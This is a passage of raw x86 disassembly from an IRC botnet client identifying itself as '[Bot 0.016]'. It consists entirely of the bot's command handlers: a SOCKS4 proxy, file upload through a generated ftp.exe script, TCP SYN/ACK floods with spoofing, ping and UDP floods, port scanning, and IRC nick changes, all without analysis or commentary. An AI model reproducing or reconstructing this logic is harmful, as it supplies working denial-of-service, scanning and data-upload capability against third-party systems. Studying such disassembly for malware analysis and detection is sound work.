push eax
push edi
lea eax, [ebp+var_3A0]
push eax
push offset sub_411080
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40D821
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aSocks4FailedTo ; "[SOCKS4]: Failed to start server thread"...
jmp loc_40E6F1
; ---------------------------------------------------------------------------
loc_40D819: ; CODE XREF: sub_408A18+4E0F�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D821: ; CODE XREF: sub_408A18+4DEE�j
cmp [ebp+var_2F8], edi
jz short loc_40D819
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_408A18+DAC�j
; sub_408A18+DC0�j ...
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_40D856
mov edi, eax
push 4
mov esi, offset aSec ; "sec"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40D856
and [ebp+var_3CC], eax
jmp short loc_40D860
; ---------------------------------------------------------------------------
loc_40D856: ; CODE XREF: sub_408A18+4E24�j
; sub_408A18+4E34�j
mov [ebp+var_3CC], 1
loc_40D860: ; CODE XREF: sub_408A18+4E3C�j
push [ebp+var_A0]
lea eax, [ebp+var_450]
push 80h
push eax
call sub_41483D
mov eax, [ebp+arg_4]
mov [ebp+var_454], eax
mov eax, [ebp+var_4]
mov [ebp+var_3C8], eax
mov eax, [ebp+var_8]
xor esi, esi
add esp, 0Ch
cmp [ebp+var_3CC], esi
mov [ebp+var_3C4], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40D8A9
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40D8A9: ; CODE XREF: sub_408A18+4E8A�j
push eax
push offset aSecureSSystem_ ; "[SECURE]: %s system."
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41483D
push esi
lea eax, [ebp+var_2F0]
push 1Ah
push eax
call sub_412471
add esp, 1Ch
mov [ebp+var_3D0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_454]
push eax
push offset sub_410579
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_3D0]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40D920
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
jmp loc_40B8EA
; ---------------------------------------------------------------------------
loc_40D918: ; CODE XREF: sub_408A18+4F0E�j
push 32h
call ds:dword_420000 ; Sleep
loc_40D920: ; CODE XREF: sub_408A18+4EED�j
cmp [ebp+var_3C0], esi
jz short loc_40D918
jmp loc_40DA31
; ---------------------------------------------------------------------------
loc_40D92D: ; CODE XREF: sub_408A18+D84�j
; sub_408A18+D98�j
push offset aBot0_016 ; "[Bot 0.016]"
lea eax, [ebp+var_2F0]
push offset aMainS ; "[MAIN]: %s"
push eax
call sub_4145E5
loc_40D943: ; CODE XREF: sub_408A18+4619�j
add esp, 0Ch
jmp loc_40C392
; ---------------------------------------------------------------------------
loc_40D94B: ; CODE XREF: sub_408A18+D5C�j
; sub_408A18+D70�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
jz short loc_40D9A3
push ebx
call sub_414972
test eax, eax
pop ecx
jl short loc_40D99B
cmp eax, 2
jge short loc_40D99B
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp byte ptr [esi], 0
jz short loc_40D993
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2F0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_4145E5
add esp, 0Ch
and byte ptr [esi], 0
jmp short loc_40DA0E
; ---------------------------------------------------------------------------
loc_40D993: ; CODE XREF: sub_408A18+4F5C�j
push eax
push offset aMainNoUserLogg ; "[MAIN]: No user logged in at slot: %d."
jmp short loc_40D9FF
; ---------------------------------------------------------------------------
loc_40D99B: ; CODE XREF: sub_408A18+4F47�j
; sub_408A18+4F4C�j
push eax
push offset aMainInvalidLog ; "[MAIN]: Invalid login slot number: %d."
jmp short loc_40D9FF
; ---------------------------------------------------------------------------
loc_40D9A3: ; CODE XREF: sub_408A18+4F3C�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_40D9A8: ; CODE XREF: sub_408A18+4FCD�j
mov esi, [ebp+var_A8]
mov eax, edx
loc_40D9B0: ; CODE XREF: sub_408A18+4FB4�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40D9D2
test cl, cl
jz short loc_40D9CE
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40D9D2
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40D9B0
loc_40D9CE: ; CODE XREF: sub_408A18+4FA2�j
xor eax, eax
jmp short loc_40D9D7
; ---------------------------------------------------------------------------
loc_40D9D2: ; CODE XREF: sub_408A18+4F9E�j
; sub_408A18+4FAC�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40D9D7: ; CODE XREF: sub_408A18+4FB8�j
test eax, eax
jz short loc_40D9E9
inc edi
add edx, 80h
cmp edi, 2
jl short loc_40D9A8
jmp short loc_40DA0E
; ---------------------------------------------------------------------------
loc_40D9E9: ; CODE XREF: sub_408A18+4FC1�j
mov eax, [ebp+arg_18]
shl edi, 7
and byte ptr [edi+eax], 0
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
loc_40D9FF: ; CODE XREF: sub_408A18+3B4A�j
; sub_408A18+4F81�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 0Ch
loc_40DA0E: ; CODE XREF: sub_408A18+2DC2�j
; sub_408A18+2DE6�j ...
cmp [ebp+var_8], 0
jnz short loc_40DA31
push 0
loc_40DA16: ; CODE XREF: sub_408A18+5422�j
; sub_408A18+5ABC�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
loc_40DA29: ; CODE XREF: sub_408A18+294C�j
; sub_408A18+2B5C�j ...
call sub_4056FB
add esp, 14h
loc_40DA31: ; CODE XREF: sub_408A18+11F3�j
; sub_408A18+2936�j ...
xor esi, esi
inc esi
jmp loc_40A143
; ---------------------------------------------------------------------------
loc_40DA39: ; CODE XREF: sub_408A18+D34�j
; sub_408A18+D48�j
mov edi, [ebp+var_A4]
push 4
mov esi, offset dword_427964
pop ecx
xor edx, edx
repe cmpsb
jz loc_409EA7
call sub_4125E2
loc_40DA56: ; CODE XREF: sub_408A18+4903�j
push 0
call ds:dword_420034 ; ExitProcess
loc_40DA5E: ; CODE XREF: sub_408A18+1577�j
push 8
mov edi, eax
mov esi, offset aHttpcon ; "httpcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DC15
push 5
mov edi, eax
mov esi, offset aHcon ; "hcon"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DC15
cmp [ebp+ebx+var_94], edx
jz loc_408C96
mov edi, eax
push 7
mov esi, offset aUpload ; "upload"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40E538
mov edi, [ebp+ebx+var_94]
push 4
push edi
call sub_402B23
test eax, eax
pop ecx
pop ecx
jnz short loc_40DAD6
push edi
push offset aFtpFileNotFoun ; "[FTP]: File not found: %s."
loc_40DAC2: ; CODE XREF: sub_408A18+3C6E�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 0Ch
jmp loc_40C0AF
; ---------------------------------------------------------------------------
loc_40DAD6: ; CODE XREF: sub_408A18+50A2�j
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
pop ecx
call sub_4147A1
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_4147A1
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_4147A1
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_1C70]
push edx
push eax
lea eax, [ebp+var_1524]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_4145E5
lea eax, [ebp+var_1524]
push offset aAb ; "ab"
push eax
call sub_414DC3
add esp, 20h
test eax, eax
mov [ebp+arg_0], eax
jz loc_408C96
mov esi, [ebp+ebx+var_A4]
push edi
push [ebp+var_14]
push [ebp+ebx+var_9C]
push [ebp+ebx+var_A0]
push esi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_415CAF
push [ebp+arg_0]
call sub_4149C3
lea eax, [ebp+var_1524]
push eax
lea eax, [ebp+var_AAC]
push offset aSS_4 ; "-s:%s"
push eax
call sub_4145E5
add esp, 2Ch
xor eax, eax
push eax
push eax
lea ecx, [ebp+var_AAC]
push ecx
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push eax
call dword_4358F0 ; ShellExecuteA
test eax, eax
push esi
push edi
jz short loc_40DBB1
push offset aFtpUploadingFi ; "[FTP]: Uploading file: %s to: %s"
jmp short loc_40DBB6
; ---------------------------------------------------------------------------
loc_40DBB1: ; CODE XREF: sub_408A18+5190�j
push offset aFtpUploading_0 ; "[FTP]: Uploading file: %s to: %s failed"...
loc_40DBB6: ; CODE XREF: sub_408A18+5197�j
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_8], 0
jnz short loc_40DBE1
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
add esp, 14h
loc_40DBE1: ; CODE XREF: sub_408A18+51AA�j
lea eax, [ebp+var_2F0]
push eax
call sub_401EFF
jmp short loc_40DBFB
; ---------------------------------------------------------------------------
loc_40DBEF: ; CODE XREF: sub_408A18+51F6�j
lea eax, [ebp+var_1524]
push eax
call sub_415C85
loc_40DBFB: ; CODE XREF: sub_408A18+51D5�j
lea eax, [ebp+var_1524]
push 4
push eax
call sub_402B23
add esp, 0Ch
test eax, eax
jnz short loc_40DBEF
jmp loc_408C96
; ---------------------------------------------------------------------------
loc_40DC15: ; CODE XREF: sub_408A18+5054�j
; sub_408A18+5068�j
push [ebp+ebx+var_94]
push [ebp+var_14]
push [ebp+ebx+var_9C]
push [ebp+ebx+var_A0]
call sub_414972
pop ecx
push eax
push [ebp+ebx+var_A4]
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4049D5
jmp loc_40E535
; ---------------------------------------------------------------------------
loc_40DC54: ; CODE XREF: sub_408A18+154F�j
; sub_408A18+1563�j
push [ebp+ebx+var_A4]
lea eax, [ebp+var_8D0]
push 80h
push eax
call sub_41483D
add esp, 0Ch
push 4
lea edi, [ebp+var_8D0]
mov esi, offset aSyn ; "syn"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40DCB5
push 4
lea edi, [ebp+var_8D0]
mov esi, offset aAck ; "ack"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40DCB5
push 7
lea edi, [ebp+var_8D0]
mov esi, offset aRandom_0 ; "random"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40DCB5
push offset aTcpInvalidFloo ; "[TCP]: Invalid flood type specified."
jmp loc_40CBA8
; ---------------------------------------------------------------------------
loc_40DCB5: ; CODE XREF: sub_408A18+5269�j
; sub_408A18+527D�j ...
push [ebp+var_14]
call sub_414972
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_7C4], eax
jle loc_40DE1D
mov eax, [ebp+ebx+var_A4]
push eax
mov [ebp+var_C], eax
mov esi, 80h
lea eax, [ebp+var_8D0]
push esi
push eax
call sub_41483D
mov eax, [ebp+ebx+var_A0]
push eax
mov [ebp+var_10], eax
lea eax, [ebp+var_950]
push esi
push eax
call sub_41483D
mov eax, [ebp+ebx+var_9C]
push eax
mov [ebp+arg_0], eax
call sub_414972
mov ebx, [ebp+ebx+var_94]
add esp, 1Ch
cmp ebx, edi
mov [ebp+var_7CC], eax
jz short loc_40DD36
push ebx
call sub_414972
pop ecx
mov [ebp+var_7C8], eax
jmp short loc_40DD3C
; ---------------------------------------------------------------------------
loc_40DD36: ; CODE XREF: sub_408A18+530D�j
mov [ebp+var_7C8], edi
loc_40DD3C: ; CODE XREF: sub_408A18+531C�j
push [ebp+var_A0]
xor eax, eax
cmp [ebp+var_44A], al
push esi
setnz al
mov [ebp+var_7C0], eax
mov eax, [ebp+arg_4]
mov [ebp+var_954], eax
lea eax, [ebp+var_850]
push eax
call sub_41483D
mov eax, [ebp+var_4]
mov [ebp+var_7BC], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp [ebp+var_7C0], edi
mov [ebp+var_7B8], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_40DD90
mov eax, offset aNormal ; "Normal"
loc_40DD90: ; CODE XREF: sub_408A18+5371�j
push [ebp+var_14]
push [ebp+arg_0]
push [ebp+var_10]
push [ebp+var_C]
push eax
push offset aTcpSSFloodingS ; "[TCP]: %s %s flooding: (%s:%s) for %s s"...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_41483D
push edi
lea eax, [ebp+var_2F0]
push 0Dh
push eax
call sub_412471
add esp, 2Ch
mov [ebp+var_7D0], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_954]
push eax
push offset sub_411A79
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_7D0]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_40DE13
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aTcpFailedToSta ; "[TCP]: Failed to start flood thread, er"...
jmp loc_40CCC5
; ---------------------------------------------------------------------------
loc_40DE0B: ; CODE XREF: sub_408A18+5401�j
push 32h
call ds:dword_420000 ; Sleep
loc_40DE13: ; CODE XREF: sub_408A18+53E0�j
cmp [ebp+var_7B4], edi
jz short loc_40DE0B
jmp short loc_40DE30
; ---------------------------------------------------------------------------
loc_40DE1D: ; CODE XREF: sub_408A18+52B0�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
loc_40DE22: ; CODE XREF: sub_408A18+5811�j
; sub_408A18+58CA�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
loc_40DE2E: ; CODE XREF: sub_408A18+419E�j
pop ecx
pop ecx
loc_40DE30: ; CODE XREF: sub_408A18+42BC�j
; sub_408A18+42D1�j ...
cmp [ebp+var_8], edi
jnz loc_40DA31
push edi
jmp loc_40DA16
; ---------------------------------------------------------------------------
loc_40DE3F: ; CODE XREF: sub_408A18+1513�j
; sub_408A18+1527�j ...
cmp dword_435968, 0
jnz loc_40DF5B
mov eax, [ebp+var_8]
mov [ebp+var_694], eax
mov eax, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A4]
mov [ebp+var_698], eax
lea eax, [ebp+var_72C]
push eax
call sub_414670
push [ebp+ebx+var_A0]
call sub_414972
push [ebp+ebx+var_9C]
mov [ebp+var_6AC], eax
call sub_414972
push [ebp+var_14]
mov [ebp+var_6A8], eax
call sub_414972
push 7Fh
push [ebp+var_A0]
mov [ebp+var_6A4], eax
lea eax, [ebp+var_7AC]
push eax
call sub_414670
push [ebp+var_6A4]
mov eax, [ebp+arg_4]
push [ebp+var_6A8]
mov [ebp+var_7B0], eax
lea eax, [ebp+var_72C]
push eax
push [ebp+var_6AC]
lea eax, [ebp+var_2F0]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_4145E5
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Fh
push eax
call sub_412471
add esp, 48h
mov [ebp+var_69C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_7B0]
push eax
push offset sub_407DF7
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_69C]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40DF4E
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40E4BB
; ---------------------------------------------------------------------------
loc_40DF46: ; CODE XREF: sub_408A18+553C�j
push 32h
call ds:dword_420000 ; Sleep
loc_40DF4E: ; CODE XREF: sub_408A18+551B�j
cmp [ebp+var_690], esi
jz short loc_40DF46
jmp loc_40E4CA
; ---------------------------------------------------------------------------
loc_40DF5B: ; CODE XREF: sub_408A18+542E�j
push 1FFh
lea eax, [ebp+var_2F0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_414670
add esp, 0Ch
xor esi, esi
jmp loc_40E4CA
; ---------------------------------------------------------------------------
loc_40DF7B: ; CODE XREF: sub_408A18+14D7�j
; sub_408A18+14EB�j ...
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A4]
mov [ebp+var_694], eax
lea eax, [ebp+var_72C]
push eax
mov [ebp+var_698], edi
call sub_414670
push [ebp+ebx+var_A0]
call sub_414972
push [ebp+ebx+var_9C]
mov [ebp+var_6AC], eax
call sub_414972
push [ebp+var_14]
mov [ebp+var_6A8], eax
call sub_414972
mov ebx, [ebp+ebx+var_94]
xor esi, esi
add esp, 18h
cmp ebx, esi
mov [ebp+var_6A4], eax
jz short loc_40DFF3
push ebx
call sub_414972
pop ecx
mov [ebp+var_6A0], eax
jmp short loc_40DFF9
; ---------------------------------------------------------------------------
loc_40DFF3: ; CODE XREF: sub_408A18+55CA�j
mov [ebp+var_6A0], esi
loc_40DFF9: ; CODE XREF: sub_408A18+55D9�j
push 7Fh
push [ebp+var_A0]
lea eax, [ebp+var_7AC]
push eax
call sub_414670
push [ebp+var_6A4]
mov ebx, [ebp+arg_4]
push [ebp+var_6A8]
lea eax, [ebp+var_72C]
push eax
push [ebp+var_6AC]
lea eax, [ebp+var_2F0]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
mov [ebp+var_7B0], ebx
call sub_4145E5
push esi
lea eax, [ebp+var_2F0]
push 10h
push eax
call sub_412471
add esp, 30h
mov [ebp+var_69C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_7B0]
push eax
push offset sub_407F80
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_69C]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40E0BA
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
push eax
call sub_4145E5
add esp, 0Ch
loc_40E0A2: ; CODE XREF: sub_408A18+56AA�j
cmp [ebp+var_8], esi
jnz loc_40DA31
push esi
push edi
jmp loc_40B798
; ---------------------------------------------------------------------------
loc_40E0B2: ; CODE XREF: sub_408A18+56A8�j
push 32h
call ds:dword_420000 ; Sleep
loc_40E0BA: ; CODE XREF: sub_408A18+566D�j
cmp [ebp+var_690], esi
jz short loc_40E0B2
jmp short loc_40E0A2
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_408A18+14AF�j
; sub_408A18+14C3�j
push 9
call sub_412661
mov esi, [ebp+ebx+var_A0]
push esi
mov edi, eax
call sub_414972
add eax, edi
cmp eax, 258h
pop ecx
pop ecx
jle short loc_40E116
push edi
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_4145E5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056FB
jmp loc_40C068
; ---------------------------------------------------------------------------
loc_40E116: ; CODE XREF: sub_408A18+56CB�j
push [ebp+ebx+var_A4]
call sub_414972
push esi
mov [ebp+var_4F4], eax
call sub_414972
push [ebp+ebx+var_9C]
mov [ebp+var_4DC], eax
call sub_414972
add esp, 0Ch
cmp eax, 5
mov [ebp+var_4F0], eax
jnb short loc_40E157
push 5
pop eax
mov [ebp+var_4F0], eax
loc_40E157: ; CODE XREF: sub_408A18+5734�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40E164
mov [ebp+var_4F0], ecx
loc_40E164: ; CODE XREF: sub_408A18+5744�j
push [ebp+var_14]
call sub_414972
mov [ebp+var_4EC], eax
mov eax, 320h
cmp [ebp+var_4EC], eax
pop ecx
jbe short loc_40E186
mov [ebp+var_4EC], eax
loc_40E186: ; CODE XREF: sub_408A18+5766�j
push [ebp+arg_4]
or [ebp+var_4D8], 0FFFFFFFFh
call sub_407D51
pop ecx
lea edx, [ebp+var_67C]
loc_40E19C: ; CODE XREF: sub_408A18+578C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40E19C
xor edi, edi
cmp dword_42B068, edi
mov [ebp+var_5FC], edi
mov [ebp+var_10], edi
jz short loc_40E21C
mov ecx, offset dword_42B068
loc_40E1BE: ; CODE XREF: sub_408A18+57E4�j
mov edi, [ebp+ebx+var_A4]
lea esi, [ecx-28h]
loc_40E1C8: ; CODE XREF: sub_408A18+57CC�j
mov dl, [esi]
mov al, dl
cmp dl, [edi]
jnz short loc_40E1EA
test al, al
jz short loc_40E1E6
mov dl, [esi+1]
mov al, dl
cmp dl, [edi+1]
jnz short loc_40E1EA
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40E1C8
loc_40E1E6: ; CODE XREF: sub_408A18+57BA�j
xor eax, eax
jmp short loc_40E1EF
; ---------------------------------------------------------------------------
loc_40E1EA: ; CODE XREF: sub_408A18+57B6�j
; sub_408A18+57C4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E1EF: ; CODE XREF: sub_408A18+57D0�j
test eax, eax
jz short loc_40E200
inc [ebp+var_10]
add ecx, 3Ch
cmp dword ptr [ecx], 0
jnz short loc_40E1BE
jmp short loc_40E21A
; ---------------------------------------------------------------------------
loc_40E200: ; CODE XREF: sub_408A18+57D9�j
mov eax, [ebp+var_10]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42B068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40E21A: ; CODE XREF: sub_408A18+57E6�j
xor edi, edi
loc_40E21C: ; CODE XREF: sub_408A18+579F�j
cmp [ebp+var_4F4], edi
jnz short loc_40E22E
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
jmp loc_40DE22
; ---------------------------------------------------------------------------
loc_40E22E: ; CODE XREF: sub_408A18+580A�j
mov esi, [ebp+ebx+var_94]
cmp esi, edi
mov [ebp+var_1C], esi
jz short loc_40E26C
cmp byte ptr [esi], 23h
jz short loc_40E26C
push esi
lea eax, [ebp+var_68C]
push 10h
push eax
call sub_41483D
push 78h
push esi
call sub_415A90
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4C8], eax
jmp loc_40E39C
; ---------------------------------------------------------------------------
loc_40E26C: ; CODE XREF: sub_408A18+5822�j
; sub_408A18+5827�j
cmp [ebp+var_442], 0
jz short loc_40E296
push 7Fh
lea eax, [ebp+var_67C]
push offset dword_42BFB8
push eax
call sub_414670
mov eax, dword_42BFC8
add esp, 0Ch
mov [ebp+var_5FC], eax
loc_40E296: ; CODE XREF: sub_408A18+585B�j
cmp [ebp+var_44B], 0
jz short loc_40E2C2
push edi
push 9
push offset aStoppingPrevio ; "Stopping previous scans"
push offset aScan_0 ; "[SCAN]"
push 1
push [ebp+var_4]
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4126A7
add esp, 20h
loc_40E2C2: ; CODE XREF: sub_408A18+5885�j
cmp [ebp+var_45B], 0
jnz short loc_40E2E7
cmp [ebp+var_45A], 0
jnz short loc_40E2E7
cmp [ebp+var_44A], 0
jnz short loc_40E2E7
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40DE22
; ---------------------------------------------------------------------------
loc_40E2E7: ; CODE XREF: sub_408A18+58B1�j
; sub_408A18+58BA�j ...
push 10h
pop esi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_28], esi
call dword_435760 ; getsockname
mov al, [ebp+var_45B]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_68C]
push eax
call sub_414670
add esp, 0Ch
cmp [ebp+var_44A], 0
jz short loc_40E396
xor eax, eax
cmp [ebp+var_45B], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_68C]
push eax
call sub_414640
and byte ptr [ebp+arg_0+3], 0
cmp esi, edi
pop ecx
pop ecx
jle short loc_40E38A
loc_40E368: ; CODE XREF: sub_408A18+5970�j
cmp eax, edi
jz short loc_40E38A
mov byte ptr [eax], 78h
lea eax, [ebp+var_68C]
push 30h
push eax
call sub_414640
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, esi
jl short loc_40E368
loc_40E38A: ; CODE XREF: sub_408A18+594E�j
; sub_408A18+5952�j
mov [ebp+var_4C8], 1
jmp short loc_40E39C
; ---------------------------------------------------------------------------
loc_40E396: ; CODE XREF: sub_408A18+5927�j
mov [ebp+var_4C8], edi
loc_40E39C: ; CODE XREF: sub_408A18+584F�j
; sub_408A18+597C�j
mov eax, [ebp+arg_4]
push [ebp+var_A0]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_8]
mov [ebp+var_4CC], eax
mov esi, 80h
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41483D
mov ebx, [ebp+ebx+var_90]
add esp, 0Ch
cmp ebx, edi
jz short loc_40E3F0
push ebx
loc_40E3DE: ; CODE XREF: sub_408A18+59E5�j
push esi
loc_40E3DF: ; CODE XREF: sub_408A18+5A02�j
lea eax, [ebp+var_578]
push eax
call sub_41483D
add esp, 0Ch
jmp short loc_40E423
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_408A18+59C3�j
mov eax, [ebp+var_1C]
cmp eax, edi
jz short loc_40E3FF
cmp byte ptr [eax], 23h
jnz short loc_40E3FF
push eax
jmp short loc_40E3DE
; ---------------------------------------------------------------------------
loc_40E3FF: ; CODE XREF: sub_408A18+59DD�j
; sub_408A18+59E2�j
xor ecx, ecx
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 420AEAh
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40E41C
push eax
push 80h
jmp short loc_40E3DF
; ---------------------------------------------------------------------------
loc_40E41C: ; CODE XREF: sub_408A18+59FA�j
and [ebp+var_578], 0
loc_40E423: ; CODE XREF: sub_408A18+59D6�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40E437
mov eax, offset aSequential ; "Sequential"
loc_40E437: ; CODE XREF: sub_408A18+5A18�j
push [ebp+var_4DC]
lea ecx, [ebp+var_68C]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_4145E5
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_412471
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_68C]
push eax
push offset sub_401B9D
push esi
push esi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_436694[ecx], eax
jnz short loc_40E4E1
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
loc_40E4BB: ; CODE XREF: sub_408A18+5529�j
lea eax, [ebp+var_2F0]
push eax
call sub_4145E5
add esp, 0Ch
loc_40E4CA: ; CODE XREF: sub_408A18+40D2�j
; sub_408A18+553E�j ...
cmp [ebp+var_8], esi
jnz loc_40DA31
push esi
jmp loc_40DA16
; ---------------------------------------------------------------------------
loc_40E4D9: ; CODE XREF: sub_408A18+5ACF�j
push 32h
call ds:dword_420000 ; Sleep
loc_40E4E1: ; CODE XREF: sub_408A18+5A95�j
cmp [ebp+var_4C4], esi
jz short loc_40E4D9
jmp short loc_40E4CA
; ---------------------------------------------------------------------------
loc_40E4EB: ; CODE XREF: sub_408A18+D0C�j
; sub_408A18+D20�j
push [ebp+ebx+var_A4]
xor eax, eax
cmp [ebp+var_44C], al
setnz al
push eax
push dword_42BED8
lea eax, [ebp+var_3BC]
push eax
call sub_40FD06
lea eax, [ebp+var_3BC]
push eax
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_4056B0
lea eax, [ebp+var_3BC]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_401F73
loc_40E535: ; CODE XREF: sub_408A18+5237�j
add esp, 24h
loc_40E538: ; CODE XREF: sub_408A18+738�j
; sub_408A18+744�j ...
mov eax, [ebp+arg_24]
jmp loc_408C99
; ---------------------------------------------------------------------------
loc_40E540: ; CODE XREF: sub_408A18+7C2�j
; sub_408A18+7D6�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
mov [ebp+var_C], ebx
jz loc_408C96
cmp [ebp+var_1C], 0
jnz loc_408C96
push offset asc_427A38 ; "!"
push [ebp+var_A8]
call sub_415459
mov esi, eax
push offset dword_425BC0
push 0
inc esi
call sub_415459
